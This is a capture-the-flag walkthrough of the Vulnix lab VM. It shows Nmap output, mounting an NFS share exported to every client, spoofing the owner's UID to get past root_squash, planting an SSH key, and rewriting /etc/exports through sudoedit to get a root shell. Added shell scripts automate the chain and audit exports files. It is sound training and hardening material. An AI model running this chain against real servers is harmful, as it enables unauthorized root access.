Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well, at the time of release anyway!).
The host is based on Ubuntu Server 12.04 and is fully patched as of early September 2012. To grab a copy, download it here: HackLAB: Vulnix
We always kick off with an Nmap scan:
nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Thu Jul 15 10:56:44 2021 as: nmap -sC -sV -oA nmap 172.16.139.216
Nmap scan report for 172.16.139.216
Host is up (0.0015s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time.
79/tcp   open  finger      Linux fingerd
|_finger: No one logged on.\x0D
110/tcp  open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL UIDL PIPELINING STLS CAPA RESP-CODES TOP
|_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time.
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      37916/udp6  mountd
|   100005  1,2,3      38356/tcp   mountd
|   100005  1,2,3      41805/tcp6  mountd
|   100005  1,2,3      57305/udp   mountd
|   100021  1,3,4      37121/udp   nlockmgr
|   100021  1,3,4      40483/udp6  nlockmgr
|   100021  1,3,4      44054/tcp6  nlockmgr
|   100021  1,3,4      60768/tcp   nlockmgr
|   100024  1          39121/udp6  status
|   100024  1          39196/tcp6  status
|   100024  1          48005/udp   status
|   100024  1          48763/tcp   status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
143/tcp  open  imap        Dovecot imapd
|_imap-capabilities: more have LOGINDISABLEDA0001 post-login LITERAL+ capabilities STARTTLS LOGIN-REFERRALS listed ID IDLE IMAP4rev1 Pre-login OK ENABLE SASL-IR
|_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time.
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login
514/tcp  open  tcpwrapped
993/tcp  open  ssl/imaps?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2021-07-15T12:57:04+00:00; +3h00m00s from scanner time.
995/tcp  open  ssl/pop3s?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after:  2022-09-02T17:40:22
|_ssl-date: 2021-07-15T12:57:04+00:00; +3h00m00s from scanner time.
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 3h00m00s, deviation: 0s, median: 3h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 15 10:57:04 2021 -- 1 IP address (1 host up) scanned in 20.52 seconds
That is a lot of ports. The box was rated hard, and I suspect the number of exposed services is the reason, but enough talking, let's start our enumeration. We have twelve open ports on the target, and the one that immediately caught my eye is
2049, which is the NFS port.
NFS (Network File System) is a client/server protocol that lets users access files across a network as if they lived in a local directory. In its default AUTH_SYS security flavour the server simply trusts the UID and GID the client presents, which is what makes misconfigured exports so easy to abuse. Now let's exploit it; it should be easy.
NFS SHARE ON PORT 2049 EXPLOIT
showmount -e 172.16.139.216
Now we know we have a share to mount:
/home/vulnix, exported to * (every client). Let's create a mount point on our attacking machine, /tmp/vulnix, and mount the share into it:
mount -v -t nfs -o vers=3,proto=tcp,nolock 172.16.139.216:/home/vulnix /tmp/vulnix
Note: mounting needs root on the attacking machine.
Mounted, but when I try to access the share I get Permission denied, even as root. That is root_squash at work: the server maps our UID 0 to the anonymous user (nobody), while the directory belongs to the vulnix user. Since we know the username is
vulnix, I try creating a matching user on my attacking machine.
FAKE USER WITH THE SAME UID
We know user
vulnix's UID is
2008 (the numeric owner shown by a numeric listing, ls -ln, of the mounted directory; only the number matters to the server, not the name), so it should be easy. Let's hit it:
useradd vulnix
usermod -u 2008 vulnix
su vulnix
Now we have access, but seriously, I got nothing, not even an SSH private key. Still, it is fine: since the server now treats us as user
vulnix, let's create a .ssh folder in the share and add an
authorized_keys file containing our
public key (id_rsa.pub, not the private id_rsa).
Back on our attacking machine, generate the key pair:
ssh-keygen -t rsa
Follow the prompts; by default ssh-keygen writes the private key to ~/.ssh/id_rsa and the public key to ~/.ssh/id_rsa.pub, so change directory to wherever you saved them.
Now back to our target, via the mount, to place the public key in .ssh/authorized_keys.
Now back to our attacking machine, let's use the private key to SSH in as user vulnix:
chmod 600 id_rsa
ssh -i id_rsa vulnix@172.16.139.216
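The whole path from mount to shell, as an added shell example that is not the write-up's own commands: the root_squash workaround is done by reading the numeric owner of the mounted directory and creating a local account with that UID, rather than guessing the name. The target address and export path are the ones from the scan above; the mount point, the local account name and the key path are assumptions, and mount/useradd need root on the attacking machine.

```shell
# Added example (not from the original write-up): working around root_squash
# on an NFS export by matching the owner UID of the exported directory.
# Assumed: target 172.16.139.216 exporting /home/vulnix (from the scan),
# a mount point under /tmp, and a public key at ~/.ssh/id_rsa.pub.

# Numeric owner UID of a path: the UID the server will trust us as.
owner_uid() {
    stat -c '%u' "$1"
}

# Mount an NFSv3 export over TCP at the given mount point (needs root).
nfs_mount() {
    target="$1"; export_path="$2"; mnt="$3"
    mkdir -p "$mnt"
    mount -t nfs -o vers=3,proto=tcp,nolock "${target}:${export_path}" "$mnt"
}

# Print the name of a local account with the given UID, creating one if
# none exists. With root_squash our UID 0 becomes nobody, but every other
# UID is passed through unchanged, so the number is all that matters.
ensure_uid_user() {
    uid="$1"; name="${2:-nfsuser$1}"
    if getent passwd "$uid" >/dev/null; then
        getent passwd "$uid" | cut -d: -f1      # reuse the existing account
    else
        useradd -u "$uid" -M -s /bin/sh "$name" && printf '%s\n' "$name"
    fi
}

# Append a public key to <mount>/.ssh/authorized_keys as the matched user.
# umask 077 gives the directory mode 700 and the file mode 600, which sshd's
# default StrictModes requires before it will honour the key.
drop_key() {
    mnt="$1"; user="$2"; pubkey="$3"
    su -s /bin/sh "$user" -c "umask 077; mkdir -p '$mnt/.ssh' && cat >> '$mnt/.ssh/authorized_keys'" < "$pubkey"
}

# Full flow, not run automatically; call from a root shell:
#   nfs_mount 172.16.139.216 /home/vulnix /tmp/vulnix
#   user=$(ensure_uid_user "$(owner_uid /tmp/vulnix)")
#   drop_key /tmp/vulnix "$user" ~/.ssh/id_rsa.pub
#   ssh -i ~/.ssh/id_rsa vulnix@172.16.139.216
```

Because ensure_uid_user reuses any existing account with the same UID, it works even when the number collides with a local user on the attacking box; the name printed is whatever account the UID resolves to.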
We are in. Let's check what sudo allows us:
sudo -l
It seems we can use
sudoedit to modify the NFS exports file (/etc/exports on a stock install).
Interesting: whoever can rewrite the export list controls which directories the server shares and whether remote root is squashed, which is effectively root. Since we can read and write that file, I think it is possible to swap the
/home/vulnix export for the root user's home directory and add our
authorized_keys there, so we can SSH in as root. Let's give it a try.
Now we change
/home/vulnix *(rw,root_squash) to
/root *(rw,no_root_squash) and confirm it with showmount -e. One caveat: the NFS server only re-reads the exports file when exportfs -ra runs or the NFS service restarts, so if showmount still lists only /home/vulnix, the new export has not taken effect yet.
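To see why the sudoedit right was the real weakness, here is an added shell example (not from the write-up) that audits an exports file for the settings just discussed: a wildcard client list, no_root_squash, and a writable export of /root. The two sample exports files are constructed from the lines above; the hardened line in the comment, with a pinned client network, is an illustrative assumption. The edit itself still needs exportfs -ra or a service restart on the server before the new export is visible.

```shell
# Added example, not the write-up's code: a small auditor for an
# /etc/exports-style file. Sample content is constructed from the two export
# lines discussed above.

# Print one finding per line. Each exports line is "<path> <client>(<opts>) ...".
audit_exports() {
    file="$1"
    grep -v '^[[:space:]]*#' "$file" | grep -v '^[[:space:]]*$' |
    while read -r path clients; do
        for entry in $clients; do
            case "$entry" in
                *\(*) host="${entry%%(*}"; opts="${entry#*(}"; opts="${opts%)}";;
                *)    host="$entry"; opts="";;
            esac
            if [ -z "$host" ]; then host='*'; fi     # "(rw)" alone means everyone
            case "$host" in
                '*') echo "$path: exported to every client";;
            esac
            case ",$opts," in
                *,no_root_squash,*) echo "$path: no_root_squash, remote uid 0 is trusted";;
            esac
            case "$path" in
                /root|/root/*) case ",$opts," in
                    *,rw,*) echo "$path: writable export of root's home";;
                esac;;
            esac
        done
    done
}

# Number of findings, for scripting and tests.
audit_count() { audit_exports "$1" | wc -l | tr -d ' '; }

# Constructed samples: the export as found on the box, and the export after
# the sudoedit change. A hardened line would pin the client network and keep
# root_squash, e.g. "/home/vulnix 172.16.139.0/24(rw,root_squash)" (assumed
# network, for illustration); AUTH_SYS still trusts client UIDs inside it.
write_samples() {
    printf '%s\n' '# exports as shipped' '/home/vulnix *(rw,root_squash)' > "$1"
    printf '%s\n' '/root *(rw,no_root_squash)' > "$2"
}
```

Run audit_exports against a copy of the target's exports file: the shipped line yields one finding (wildcard clients), the modified line yields three, and the no_root_squash finding is the one that turns a mount into a root shell.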
Boom. Now let's mount the NFS share:
mount -v -t nfs -o vers=3,proto=tcp,nolock 172.16.139.216:/root /tmp/root
Mounted. Now let's change directory to /tmp/root.
We have the root flag, but I want SSH access as root. With no_root_squash on the export, our local root writes into /root as UID 0, so let's add our public key to /root/.ssh/authorized_keys (keep the directory at mode 700 and the file at 600; sshd's default StrictModes ignores keys in files writable by others).
Now let's try to SSH as root with the private key.
We are done and dusted.
Greetings from Muzec